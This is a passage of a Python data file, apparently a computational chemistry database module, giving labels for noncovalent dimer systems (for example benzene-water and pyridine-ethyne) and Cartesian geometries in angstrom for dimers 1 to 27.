TAGL['%s-%s-monoB-unCP' % (dbse, '52' )] = """Monomer B from Benzene-Acetic Acid, OH-pi """
TAGL['%s-%s' % (dbse, '53' )] = """Benzene-Acetamide, NH-pi """
TAGL['%s-%s-dimer' % (dbse, '53' )] = """Dimer from Benzene-Acetamide, NH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '53' )] = """Monomer A from Benzene-Acetamide, NH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '53' )] = """Monomer B from Benzene-Acetamide, NH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '53' )] = """Monomer A from Benzene-Acetamide, NH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '53' )] = """Monomer B from Benzene-Acetamide, NH-pi """
TAGL['%s-%s' % (dbse, '54' )] = """Benzene-Water, OH-pi """
TAGL['%s-%s-dimer' % (dbse, '54' )] = """Dimer from Benzene-Water, OH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '54' )] = """Monomer A from Benzene-Water, OH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '54' )] = """Monomer B from Benzene-Water, OH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '54' )] = """Monomer A from Benzene-Water, OH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '54' )] = """Monomer B from Benzene-Water, OH-pi """
TAGL['%s-%s' % (dbse, '55' )] = """Benzene-Methanol, OH-pi """
TAGL['%s-%s-dimer' % (dbse, '55' )] = """Dimer from Benzene-Methanol, OH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '55' )] = """Monomer A from Benzene-Methanol, OH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '55' )] = """Monomer B from Benzene-Methanol, OH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '55' )] = """Monomer A from Benzene-Methanol, OH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '55' )] = """Monomer B from Benzene-Methanol, OH-pi """
TAGL['%s-%s' % (dbse, '56' )] = """Benzene-Methylamine, NH-pi """
TAGL['%s-%s-dimer' % (dbse, '56' )] = """Dimer from Benzene-Methylamine, NH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '56' )] = """Monomer A from Benzene-Methylamine, NH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '56' )] = """Monomer B from Benzene-Methylamine, NH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '56' )] = """Monomer A from Benzene-Methylamine, NH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '56' )] = """Monomer B from Benzene-Methylamine, NH-pi """
TAGL['%s-%s' % (dbse, '57' )] = """Benzene-N-methylacetamide, NH-pi """
TAGL['%s-%s-dimer' % (dbse, '57' )] = """Dimer from Benzene-N-methylacetamide, NH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '57' )] = """Monomer A from Benzene-N-methylacetamide, NH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '57' )] = """Monomer B from Benzene-N-methylacetamide, NH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '57' )] = """Monomer A from Benzene-N-methylacetamide, NH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '57' )] = """Monomer B from Benzene-N-methylacetamide, NH-pi """
TAGL['%s-%s' % (dbse, '58' )] = """Pyridine Dimer, CH-N """
TAGL['%s-%s-dimer' % (dbse, '58' )] = """Dimer from Pyridine Dimer, CH-N """
TAGL['%s-%s-monoA-CP' % (dbse, '58' )] = """Monomer A from Pyridine Dimer, CH-N """
TAGL['%s-%s-monoB-CP' % (dbse, '58' )] = """Monomer B from Pyridine Dimer, CH-N """
TAGL['%s-%s-monoA-unCP' % (dbse, '58' )] = """Monomer A from Pyridine Dimer, CH-N """
TAGL['%s-%s-monoB-unCP' % (dbse, '58' )] = """Monomer B from Pyridine Dimer, CH-N """
TAGL['%s-%s' % (dbse, '59' )] = """Ethyne-Water, CH-O """
TAGL['%s-%s-dimer' % (dbse, '59' )] = """Dimer from Ethyne-Water, CH-O """
TAGL['%s-%s-monoA-CP' % (dbse, '59' )] = """Monomer A from Ethyne-Water, CH-O """
TAGL['%s-%s-monoB-CP' % (dbse, '59' )] = """Monomer B from Ethyne-Water, CH-O """
TAGL['%s-%s-monoA-unCP' % (dbse, '59' )] = """Monomer A from Ethyne-Water, CH-O """
TAGL['%s-%s-monoB-unCP' % (dbse, '59' )] = """Monomer B from Ethyne-Water, CH-O """
TAGL['%s-%s' % (dbse, '60' )] = """Ethyne-Acetic Acid, OH-pi """
TAGL['%s-%s-dimer' % (dbse, '60' )] = """Dimer from Ethyne-Acetic Acid, OH-pi """
TAGL['%s-%s-monoA-CP' % (dbse, '60' )] = """Monomer A from Ethyne-Acetic Acid, OH-pi """
TAGL['%s-%s-monoB-CP' % (dbse, '60' )] = """Monomer B from Ethyne-Acetic Acid, OH-pi """
TAGL['%s-%s-monoA-unCP' % (dbse, '60' )] = """Monomer A from Ethyne-Acetic Acid, OH-pi """
TAGL['%s-%s-monoB-unCP' % (dbse, '60' )] = """Monomer B from Ethyne-Acetic Acid, OH-pi """
TAGL['%s-%s' % (dbse, '61' )] = """Pentane-Acetic Acid """
TAGL['%s-%s-dimer' % (dbse, '61' )] = """Dimer from Pentane-Acetic Acid """
TAGL['%s-%s-monoA-CP' % (dbse, '61' )] = """Monomer A from Pentane-Acetic Acid """
TAGL['%s-%s-monoB-CP' % (dbse, '61' )] = """Monomer B from Pentane-Acetic Acid """
TAGL['%s-%s-monoA-unCP' % (dbse, '61' )] = """Monomer A from Pentane-Acetic Acid """
TAGL['%s-%s-monoB-unCP' % (dbse, '61' )] = """Monomer B from Pentane-Acetic Acid """
TAGL['%s-%s' % (dbse, '62' )] = """Pentane-Acetamide """
TAGL['%s-%s-dimer' % (dbse, '62' )] = """Dimer from Pentane-Acetamide """
TAGL['%s-%s-monoA-CP' % (dbse, '62' )] = """Monomer A from Pentane-Acetamide """
TAGL['%s-%s-monoB-CP' % (dbse, '62' )] = """Monomer B from Pentane-Acetamide """
TAGL['%s-%s-monoA-unCP' % (dbse, '62' )] = """Monomer A from Pentane-Acetamide """
TAGL['%s-%s-monoB-unCP' % (dbse, '62' )] = """Monomer B from Pentane-Acetamide """
TAGL['%s-%s' % (dbse, '63' )] = """Benzene-Acetic Acid """
TAGL['%s-%s-dimer' % (dbse, '63' )] = """Dimer from Benzene-Acetic Acid """
TAGL['%s-%s-monoA-CP' % (dbse, '63' )] = """Monomer A from Benzene-Acetic Acid """
TAGL['%s-%s-monoB-CP' % (dbse, '63' )] = """Monomer B from Benzene-Acetic Acid """
TAGL['%s-%s-monoA-unCP' % (dbse, '63' )] = """Monomer A from Benzene-Acetic Acid """
TAGL['%s-%s-monoB-unCP' % (dbse, '63' )] = """Monomer B from Benzene-Acetic Acid """
TAGL['%s-%s' % (dbse, '64' )] = """N-methylacetamide-Ethene """
TAGL['%s-%s-dimer' % (dbse, '64' )] = """Dimer from N-methylacetamide-Ethene """
TAGL['%s-%s-monoA-CP' % (dbse, '64' )] = """Monomer A from N-methylacetamide-Ethene """
TAGL['%s-%s-monoB-CP' % (dbse, '64' )] = """Monomer B from N-methylacetamide-Ethene """
TAGL['%s-%s-monoA-unCP' % (dbse, '64' )] = """Monomer A from N-methylacetamide-Ethene """
TAGL['%s-%s-monoB-unCP' % (dbse, '64' )] = """Monomer B from N-methylacetamide-Ethene """
TAGL['%s-%s' % (dbse, '65' )] = """Pyridine-Ethyne """
TAGL['%s-%s-dimer' % (dbse, '65' )] = """Dimer from Pyridine-Ethyne """
TAGL['%s-%s-monoA-CP' % (dbse, '65' )] = """Monomer A from Pyridine-Ethyne """
TAGL['%s-%s-monoB-CP' % (dbse, '65' )] = """Monomer B from Pyridine-Ethyne """
TAGL['%s-%s-monoA-unCP' % (dbse, '65' )] = """Monomer A from Pyridine-Ethyne """
TAGL['%s-%s-monoB-unCP' % (dbse, '65' )] = """Monomer B from Pyridine-Ethyne """
TAGL['%s-%s' % (dbse, '66' )] = """Methylamine-Pyridine """
TAGL['%s-%s-dimer' % (dbse, '66' )] = """Dimer from Methylamine-Pyridine """
TAGL['%s-%s-monoA-CP' % (dbse, '66' )] = """Monomer A from Methylamine-Pyridine """
TAGL['%s-%s-monoB-CP' % (dbse, '66' )] = """Monomer B from Methylamine-Pyridine """
TAGL['%s-%s-monoA-unCP' % (dbse, '66' )] = """Monomer A from Methylamine-Pyridine """
TAGL['%s-%s-monoB-unCP' % (dbse, '66' )] = """Monomer B from Methylamine-Pyridine """
# <<< Geometry Specification Strings >>>
GEOS = {}
GEOS['%s-%s-dimer' % (dbse, '1')] = qcdb.Molecule("""
0 1
O -0.70219605 -0.05606026 0.00994226
H -1.02219322 0.84677578 -0.01148871
H 0.25752106 0.04212150 0.00521900
--
0 1
O 2.22087107 0.02671679 0.00062048
H 2.59749268 -0.41166327 0.76674486
H 2.59313538 -0.44949618 -0.74478203
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '2')] = qcdb.Molecule("""
0 1
O -0.52532979 -0.05097108 -0.31451686
H -0.94200663 0.74790163 0.01125282
H 0.40369652 0.05978598 -0.07356837
--
0 1
O 2.31663329 0.04550085 0.07185839
H 2.68461611 -0.52657655 0.74938672
C 2.78163836 -0.42612907 -1.19030072
H 2.35082127 0.22496462 -1.94341475
H 3.86760205 -0.37533621 -1.26461265
H 2.45329574 -1.44599856 -1.38938136
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '3')] = qcdb.Molecule("""
0 1
O -0.68746490 -0.11174433 -0.01962547
H -1.04612154 0.77593821 0.01270684
H 0.27404252 0.02585065 -0.00349726
--
0 1
N 2.23397617 0.10318260 0.00585368
H 2.52934060 -0.44945538 -0.78893718
H 2.54405666 -0.40753849 0.82271317
C 2.89331145 1.41154656 -0.03438796
H 2.58276902 1.99327152 0.83012746
H 3.98462074 1.37225159 -0.04334363
H 2.56659917 1.94746403 -0.92221177
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '4')] = qcdb.Molecule("""
0 1
O -0.39201845 -0.38471874 0.07607132
H -0.91146085 0.41381204 0.17764877
H 0.52490382 -0.06848469 0.09051136
--
0 1
C 2.19770521 -2.24540349 -0.23031325
H 2.84766805 -3.10651537 -0.36322864
H 1.51672924 -2.16793143 -1.07417853
H 1.58468831 -2.38419948 0.65669511
C 2.95243729 -0.94739061 -0.09771974
O 2.37572184 0.12790424 0.05886900
N 4.30307041 -1.04489330 -0.16233771
H 4.70402204 -1.95542728 -0.29185281
C 5.17131253 0.10707716 -0.05289463
H 4.53481840 0.97537761 0.08188998
H 5.83690203 0.01562196 0.80319825
H 5.76577825 0.23649765 -0.95515382
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '5')] = qcdb.Molecule("""
0 1
O -0.63613493 -0.02328241 0.28059932
H 0.30809737 -0.04707875 0.07646369
C -1.15206541 -1.31128778 0.01525955
H -2.20994502 -1.29626539 0.26395586
H -1.05661024 -1.59267086 -1.03619061
H -0.67483575 -2.08627276 0.62051145
--
0 1
O 2.21041928 -0.12212177 -0.01210270
H 2.67920859 0.49226275 -0.58176865
C 2.71925320 0.03489717 1.30961462
H 2.16568412 -0.65329926 1.93974550
H 3.77824931 -0.21554173 1.36633776
H 2.56681356 1.04559122 1.68750717
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '6')] = qcdb.Molecule("""
0 1
O -0.70692019 0.04583037 0.00638610
H 0.26562361 0.07171014 0.00133929
C -1.07667067 -1.31391581 0.00161428
H -2.16292358 -1.36319577 0.00586542
H -0.72340594 -1.84465168 -0.88774350
H -0.71607978 -1.85282083 0.88307978
--
0 1
N 2.20127244 -0.03642087 -0.00333839
H 2.57189199 0.47135563 0.78979400
H 2.57201528 0.42791769 -0.82259722
C 2.67902438 -1.42245432 0.03412282
H 2.28713954 -1.95647960 -0.82806891
H 3.76573553 -1.52918949 0.03715731
H 2.28689798 -1.90918449 0.92375496
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '7')] = qcdb.Molecule("""
0 1
O -0.20877739 -0.21687067 -1.03240597
H 0.71112593 -0.38689175 -0.77396240
C -1.02217337 -0.74117114 -0.00545419
H -2.05749119 -0.53870733 -0.26859725
H -0.90774336 -1.82182632 0.10853710
H -0.82463111 -0.27549472 0.96464547
--
0 1
C 1.97349049 1.90322403 0.43230118
H 2.47988412 2.86467311 0.39743082
H 1.56294637 1.75708815 1.43017782
H 1.14384269 1.89371075 -0.26920435
C 2.88912087 0.74828521 0.11638497
O 2.46492608 -0.37162558 -0.16869657
N 4.21525779 1.01000949 0.17558433
H 4.51327024 1.92043762 0.47327152
C 5.19766382 -0.03010182 -0.04715949
H 4.84110663 -0.68103914 -0.83933645
H 6.13803306 0.42342202 -0.34567319
H 5.35717393 -0.63462872 0.84491605
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '8')] = qcdb.Molecule("""
0 1
O -0.78656202 0.04516844 -0.00718912
H 0.17770677 0.01269590 -0.00683539
C -1.24799094 -1.29028354 0.00108362
H -2.33427744 -1.25889710 0.00022120
H -0.92596575 -1.84976810 -0.88044538
H -0.92702783 -1.83846288 0.89007652
--
0 1
O 2.12888314 -0.05133660 -0.00474093
H 2.56808728 0.33681560 -0.76461362
H 2.56676744 0.35126768 0.74834860
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '9')] = qcdb.Molecule("""
0 1
N -0.89345122 -0.04384432 -0.04299745
H 0.09694826 -0.25605945 -0.07106993
H -1.36843879 -0.93339065 0.03383773
C -1.17578248 0.75790769 1.14523719
H -2.24162660 0.97221601 1.19502464
H -0.88078955 0.30424674 2.09720910
H -0.66300572 1.71432940 1.06080916
--
0 1
O 2.28445953 -0.04747650 0.02782522
H 2.56648565 0.32247227 -0.81203886
C 2.67037338 0.86410776 1.04726138
H 2.34719033 0.43447509 1.99032792
H 3.75142862 1.00319123 1.08630135
H 2.19189882 1.83770561 0.93208484
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '10')] = qcdb.Molecule("""
0 1
N -0.63864138 0.47091637 0.04456848
H 0.18995436 -0.11393716 -0.00577361
H -1.30046894 0.08125680 -0.61366848
C -1.19865882 0.39139858 1.39194660
H -2.09273777 1.00924471 1.45316749
H -1.46274551 -0.61584367 1.72945219
H -0.48027554 0.79867491 2.10108731
--
0 1
N 2.39889347 -0.45552115 0.19704452
H 2.69516214 -0.18098342 -0.73094072
H 3.02244314 -1.20321147 0.47223938
C 2.55912345 0.67968944 1.11071982
H 2.28893315 0.36499366 2.11637293
H 3.56653376 1.10146600 1.14769156
H 1.86658307 1.46546492 0.81806258
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '11')] = qcdb.Molecule("""
0 1
N -0.56970824 0.81437245 0.10109775
H 0.13087774 0.56141065 -0.58761455
H -1.46125215 0.52691480 -0.28042996
C -0.30551437 0.06571030 1.32879173
H -1.05714948 0.31427017 2.07595940
H -0.28802353 -1.02229248 1.21484626
H 0.66045772 0.36850913 1.73024224
--
0 1
C 2.25689155 2.69009990 -0.14932730
H 2.38151002 3.10127663 -1.14837163
H 2.76346292 3.33109245 0.56845722
H 1.19047979 2.66357037 0.06909413
C 2.76888324 1.27230222 -0.14703327
O 2.30890335 0.40656580 -0.88620788
N 3.75536621 0.99926987 0.74529744
H 4.15512723 1.75420265 1.27065019
C 4.34381155 -0.32032067 0.82279701
H 3.55563493 -1.06165082 0.72977641
H 5.06507133 -0.49231605 0.02425262
H 4.83846506 -0.43618886 1.78273654
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '12')] = qcdb.Molecule("""
0 1
N -0.53346397 -0.27959351 0.10699576
H -0.62915138 -1.24842455 0.38284867
H -1.12260363 -0.16615944 -0.70776410
C -1.01690943 0.58848610 1.18737346
H -0.91275967 1.62555174 0.87952116
H -2.05473726 0.41508213 1.47850360
H -0.38502338 0.44880090 2.06061419
--
0 1
O 2.09326841 0.91731136 0.21209725
H 1.27575101 0.42103887 0.03894435
H 2.67516986 0.65881349 -0.50364884
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '13')] = qcdb.Molecule("""
0 1
C -0.84931672 -0.33949876 2.49171664
H 0.18434396 -0.01104732 2.41618542
H -0.88249791 -1.34205140 2.91270310
H -1.39080263 0.31687828 3.16842897
C -1.56403192 -0.35332311 1.15947545
O -2.74952638 -0.65153776 1.05676087
N -0.80165352 -0.02735461 0.08834167
H 0.16118756 0.24036035 0.21871364
C -1.38534986 -0.00235149 -1.23413683
H -1.89161720 -0.94280123 -1.44009631
H -2.11997230 0.79621180 -1.33087952
H -0.59464593 0.14957065 -1.96312772
--
0 1
O 2.13706570 0.25201737 0.45371880
H 2.85792051 0.87931700 0.54413361
C 2.65614986 -1.05334828 0.68760059
H 1.82357836 -1.74213597 0.58202402
H 3.42228862 -1.32234103 -0.03928018
H 3.06424691 -1.15479748 1.69323508
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '14')] = qcdb.Molecule("""
0 1
C -0.77857334 -0.46332064 2.49038768
H 0.22474462 -0.05095294 2.41348355
H -0.72247994 -1.48709180 2.85458464
H -1.35190757 0.11081693 3.21368365
C -1.52050259 -0.45662769 1.17232500
O -2.70083521 -0.78358573 1.08959682
N -0.79195361 -0.06964048 0.10058937
H 0.19411165 0.14570790 0.20292464
C -1.39779834 -0.05608245 -1.21131793
H -2.31492801 0.52889121 -1.19970991
H -0.69880422 0.38726130 -1.91536621
H -1.65298232 -1.06152895 -1.54543495
--
0 1
N 2.23828822 0.25457428 0.28251924
H 2.64195454 0.79449381 1.03771933
H 2.65629209 0.62195553 -0.56312668
C 2.61059106 -1.15660854 0.43627199
H 2.18430366 -1.72764112 -0.38510346
H 3.68598970 -1.34329798 0.46205539
H 2.17611849 -1.54101555 1.35610799
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '15')] = qcdb.Molecule("""
0 1
C -0.70150294 -0.29062770 2.40688440
H -1.18329596 0.39564777 3.09887422
H 0.34956157 -0.03032157 2.30783303
H -0.79405685 -1.29160545 2.82403929
C -1.44854625 -0.24487664 1.09181530
O -2.66045000 -0.42847909 1.03434577
N -0.67005656 0.00591656 0.00977691
H 0.32667532 0.12256396 0.14159284
C -1.22705457 0.08979374 -1.31996754
H -2.29202426 -0.10650119 -1.24087756
H -1.07780169 1.07994030 -1.74854354
H -0.77662849 -0.64799919 -1.98337273
--
0 1
C 2.04177491 -2.35169797 0.68639761
H 2.59999972 -3.26170120 0.48048961
H 1.11308306 -2.35822742 0.12207220
H 1.78255599 -2.32825127 1.74333861
C 2.80941086 -1.09728593 0.35016088
O 2.26422421 0.00415088 0.29318848
N 4.13616907 -1.26609970 0.13641291
H 4.51249037 -2.19334539 0.21317023
C 5.02340725 -0.15963372 -0.15253563
H 4.40921487 0.73117605 -0.23235934
H 5.75082180 -0.02016799 0.64486768
H 5.54839755 -0.31961545 -1.09167796
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '16')] = qcdb.Molecule("""
0 1
C -0.72430464 -0.70493582 2.28386786
H 0.33531828 -0.62994325 2.05318235
H -0.95169666 -1.71198961 2.62565146
H -0.96962784 -0.02207955 3.09376537
C -1.61493501 -0.38742925 1.10406897
O -2.83732387 -0.41502209 1.19413277
N -0.95342037 -0.07640442 -0.04081980
H 0.05380860 -0.07556651 -0.03664022
C -1.65812397 0.25009358 -1.25855306
H -2.72037197 0.17694444 -1.04665270
H -1.43030493 1.26296263 -1.58809384
H -1.40562611 -0.44433518 -2.05858358
--
0 1
O 2.10277707 -0.05840697 -0.15507669
H 2.66775436 -0.77136560 -0.46027609
H 2.68252869 0.70578659 -0.13117819
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '17')] = qcdb.Molecule("""
0 1
N -0.72999913 0.02276763 0.00091465
H 0.29842255 0.07400447 0.00162304
C -1.29682453 -1.24042682 0.00150234
O -0.59409886 -2.25351751 0.00263371
C -2.74362229 -1.26233170 0.00047938
H -3.24959045 -2.21183517 0.00083311
C -3.42201997 -0.09590921 -0.00092259
H -4.50089709 -0.04921603 -0.00174546
N -2.77483684 1.10540895 -0.00141807
H -3.28383807 1.97387739 -0.00248574
C -1.39147866 1.23701978 -0.00052538
O -0.83984371 2.31703528 -0.00100125
--
0 1
N 4.14382946 -1.08570382 0.00049928
H 4.59107325 -0.17913062 0.00088609
C 4.99987723 -2.20032161 -0.00100060
O 6.20932926 -2.04861719 -0.00174980
C 4.28565880 -3.46249515 -0.00150500
H 4.85224335 -4.37752590 -0.00264363
C 2.93548983 -3.46631302 -0.00054490
H 2.35852659 -4.37927779 -0.00086358
N 2.19749842 -2.31543218 0.00090551
H 1.17116216 -2.33687498 0.00158258
C 2.77026935 -1.07076714 0.00145616
O 2.11994847 -0.02954883 0.00269255
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '18')] = qcdb.Molecule("""
0 1
O -0.55283102 -0.10169749 -0.00049879
H -0.87175963 0.80179220 0.00014440
H 0.41265950 -0.00183225 -0.00025181
--
0 1
N 2.36402099 0.09662268 0.00014680
C 3.05992763 0.06265189 1.14489465
H 2.47525508 0.08626283 2.05576267
C 4.44895122 -0.00253054 1.19489071
H 4.95485760 -0.02738470 2.14921983
C 5.16011436 -0.03565634 -0.00002044
H 6.23995431 -0.08742989 -0.00010086
C 4.44880607 -0.00259720 -1.19482173
H 4.95460301 -0.02747022 -2.14922033
C 3.05977605 0.06259779 -1.14467547
H 2.47500717 0.08619845 -2.05546803
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '19')] = qcdb.Molecule("""
0 1
O -0.62765177 0.08746727 0.00147128
H 0.34360203 0.12230333 -0.00060045
C -0.97793123 -1.27855601 0.00123841
H -2.06339209 -1.34204332 0.00500898
H -0.61488369 -1.80637584 -0.88538395
H -0.60864033 -1.80823682 0.88417273
--
0 1
N 2.27233665 0.01643230 -0.00162684
C 2.96870504 -0.00800303 -1.14634644
H 2.38422645 0.01522051 -2.05732188
C 4.35834211 -0.05774589 -1.19503169
H 4.86569445 -0.07503793 -2.14881442
C 5.06871533 -0.08345851 0.00058133
H 6.14905134 -0.12122326 0.00143063
C 4.35646788 -0.05843740 1.19512119
H 4.86226662 -0.07626173 2.14960688
C 2.96691424 -0.00868772 1.14416710
H 2.38090845 0.01398671 2.05428579
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '20')] = qcdb.Molecule("""
0 1
C -1.06170920 1.29714057 0.29206000
O -0.35816112 2.27045861 0.53181267
O -0.58930352 0.09491776 0.00378881
H 0.40443566 0.12772262 0.01841184
C -2.55842780 1.34254982 0.29625732
H -2.89599798 2.34746400 0.51831634
H -2.93288928 1.02239045 -0.67299555
H -2.93721196 0.64491043 1.03955708
--
0 1
C 2.78934845 1.10841924 0.27118376
O 2.08573008 0.13510475 0.03139616
O 2.31692211 2.31085463 0.55896223
H 1.32313357 2.27795640 0.54456172
C 4.28606090 1.06251650 0.26921936
H 4.62364046 0.06119730 0.03169387
H 4.66755944 1.77286944 -0.46024953
H 4.65757721 1.36521101 1.24527472
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '21')] = qcdb.Molecule("""
0 1
C -1.30974974 1.18017617 -0.02517034
O -0.72530044 2.15514767 0.45271335
N -0.66562116 0.09505470 -0.49199449
H 0.35458266 0.05144817 -0.45930922
H -1.18362704 -0.67359969 -0.87075610
C -2.81671934 1.15599865 -0.11060597
H -3.22062895 1.26254146 0.89308239
H -3.20942754 0.24863402 -0.56190009
H -3.14315813 2.01659563 -0.68889311
--
0 1
C 2.77960183 1.06388568 0.13435724
O 2.19518007 0.08986525 -0.34537373
N 2.13551426 2.14862891 0.60220379
H 1.11540890 2.19306669 0.56790248
H 2.65353833 2.91659011 0.98232444
C 4.28660101 1.08817006 0.21958232
H 4.67847207 1.98781958 0.68676633
H 4.69015720 1.00062503 -0.78619798
H 4.61437977 0.21759516 0.78176266
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '22')] = qcdb.Molecule("""
0 1
C -1.11362611 1.32702009 0.27516705
O -0.46708264 2.34938778 0.46153746
O -0.57808939 0.13692049 0.04961747
H 0.41332036 0.20325661 0.05548711
C -2.61142469 1.28618957 0.27736131
H -3.00664872 2.27688545 0.46578983
H -2.96425623 0.91525868 -0.68200123
H -2.95311421 0.59179821 1.04124041
--
0 1
N 4.18869738 1.08795338 0.18288157
H 4.58190249 0.17256315 0.01116215
C 5.11022529 2.13606900 0.36433468
O 6.30737167 1.91777319 0.31145472
C 4.47115922 3.41553138 0.60494183
H 5.09069398 4.28245626 0.75641911
C 3.12407502 3.49552153 0.63432307
H 2.60123483 4.42396853 0.80962128
N 2.32034427 2.40483955 0.44391704
H 1.29629244 2.47478724 0.46770730
C 2.82027675 1.15461676 0.20974482
O 2.10824430 0.16511187 0.03627464
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '23')] = qcdb.Molecule("""
0 1
C -1.23272700 1.21163896 -0.14162406
O -0.57127667 2.24201573 0.02561679
N -0.67058051 0.00388878 -0.31428147
H 0.34384695 -0.09056011 -0.30832667
H -1.24421373 -0.80632370 -0.44668271
C -2.73824495 1.26675766 -0.15588657
H -3.07797534 1.64660511 0.80450159
H -3.20211503 0.30286549 -0.34621112
H -3.04998747 1.97549049 -0.91859737
--
0 1
N 4.19521289 1.11742864 -0.11954193
H 4.68524234 0.24147146 -0.23748040
C 4.99883890 2.26027358 0.03093977
O 6.21440093 2.16465126 0.01575499
C 4.22624673 3.47559007 0.19408371
H 4.74800972 4.40878293 0.31711883
C 2.87708602 3.41391454 0.18840695
H 2.25668197 4.29027492 0.30608385
N 2.19200391 2.24163303 0.03384119
H 1.15921343 2.23257196 0.03300387
C 2.82289388 1.03716353 -0.12841885
O 2.22570515 -0.02675243 -0.27022634
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '24')] = qcdb.Molecule("""
0 1
C 0.71264532 1.12099570 0.06054078
H 1.35784165 1.98639917 0.12773717
C 1.25823573 -0.15925190 0.12423352
H 2.32495428 -0.28709988 0.24674303
C 0.42688496 -1.27452666 0.04265043
H 0.85044465 -2.26843268 0.09474995
C -0.94957784 -1.11007406 -0.10031360
H -1.59445570 -1.97627370 -0.16371348
C -1.49552564 0.17105056 -0.16154602
H -2.56378279 0.29922115 -0.27370311
C -0.66382760 1.28664289 -0.08340143
H -1.08690070 2.28100020 -0.13288613
--
0 1
C 1.98776046 1.10975720 3.71031958
H 2.63260558 1.97594094 3.77407030
C 2.53371358 -0.17139390 3.77183931
H 3.60192047 -0.29954095 3.88458353
C 1.70206410 -1.28699400 3.69318889
H 2.12514581 -2.28134643 3.74284255
C 0.32566254 -1.12135897 3.54847214
H -0.31944006 -1.98676921 3.48083951
C -0.21989733 0.15887378 3.48450631
H -1.28652536 0.28670299 3.36132755
C 0.61137962 1.27415454 3.56657725
H 0.18785474 2.26805957 3.51420832
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '25')] = qcdb.Molecule("""
0 1
N 1.57248145 0.25454916 -0.25648131
C 0.96935990 -0.90316032 0.04452614
H 1.61363891 -1.77218120 0.10234520
C -0.39815811 -1.02881911 0.28096043
H -0.81842477 -1.99173710 0.53356364
C -1.19580525 0.10655779 0.19539732
H -2.26068964 0.04953865 0.37344280
C -0.58712829 1.31741239 -0.12010544
H -1.16181223 2.22950003 -0.20046257
C 0.78854733 1.33970567 -0.33224053
H 1.28843202 2.26879436 -0.57852690
--
0 1
N -0.53372327 -1.51586163 3.84414371
C -1.46620136 -0.55523217 3.91799487
H -2.46899061 -0.88618697 4.16018773
C -1.20419832 0.79583625 3.70861549
H -2.00275608 1.52034169 3.78688658
C 0.09522901 1.18507754 3.39834708
H 0.33721357 2.22407602 3.22247582
C 1.07478832 0.20217938 3.31498561
H 2.09708956 0.44892512 3.06654863
C 0.71230860 -1.12295838 3.54817861
H 1.45616936 -1.90851301 3.49173001
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '26')] = qcdb.Molecule("""
0 1
N 1.37690111 0.83974747 0.73462494
H 1.05181240 1.38622385 1.52335563
C 1.30898271 1.45752981 -0.52065500
O 0.92056136 2.61107777 -0.62597673
N 2.01142293 -1.21320830 -0.09807182
H 1.72728551 0.99084268 -2.61199556
C 2.02573687 -0.69717123 -1.36439740
H 2.29751698 -1.39106004 -2.14564531
C 1.71451235 0.59193780 -1.61248722
H 2.12945422 -2.20152091 0.05682913
C 1.64594503 -0.48520598 1.01871830
O 1.56111602 -0.97181638 2.12980905
--
0 1
N -1.35546089 -0.83604594 0.73462494
H -1.03037218 -1.38252232 1.52335563
C -1.28754249 -1.45382828 -0.52065500
O -0.89912114 -2.60737623 -0.62597673
N -1.98998271 1.21690983 -0.09807182
H -1.70584529 -0.98714115 -2.61199556
C -2.00429665 0.70087276 -1.36439740
H -2.27607676 1.39476157 -2.14564531
C -1.69307213 -0.58823627 -1.61248722
H -2.10801399 2.20522244 0.05682913
C -1.62450481 0.48890751 1.01871830
O -1.53967580 0.97551791 2.12980905
units angstrom
""")
GEOS['%s-%s-dimer' % (dbse, '27')] = qcdb.Molecule("""
0 1
C 0.81874699 0.86417234 0.18828612
H 1.46611361 1.71666767 0.34472141
C 1.36899712 -0.39052394 -0.06669818
H 2.44303637 -0.51186194 -0.11057444
C 0.53437860 -1.48849320 -0.27188804
H 0.96084825 -2.46156422 -0.47550749
C -0.84911561 -1.33050735 -0.21989643
H -1.49706942 -2.18186028 -0.37955321
C -1.39948546 -0.07603020 0.04043417
H -2.47268667 0.04490778 0.09338206
C -0.56529230 1.02140336 0.24227921
H -0.99255667 1.99366131 0.44625817
--
0 1
N -2.39843199 0.16214088 3.52041137
C -1.78354606 1.31980869 3.80047556
H -2.43115011 2.17298014 3.96298765
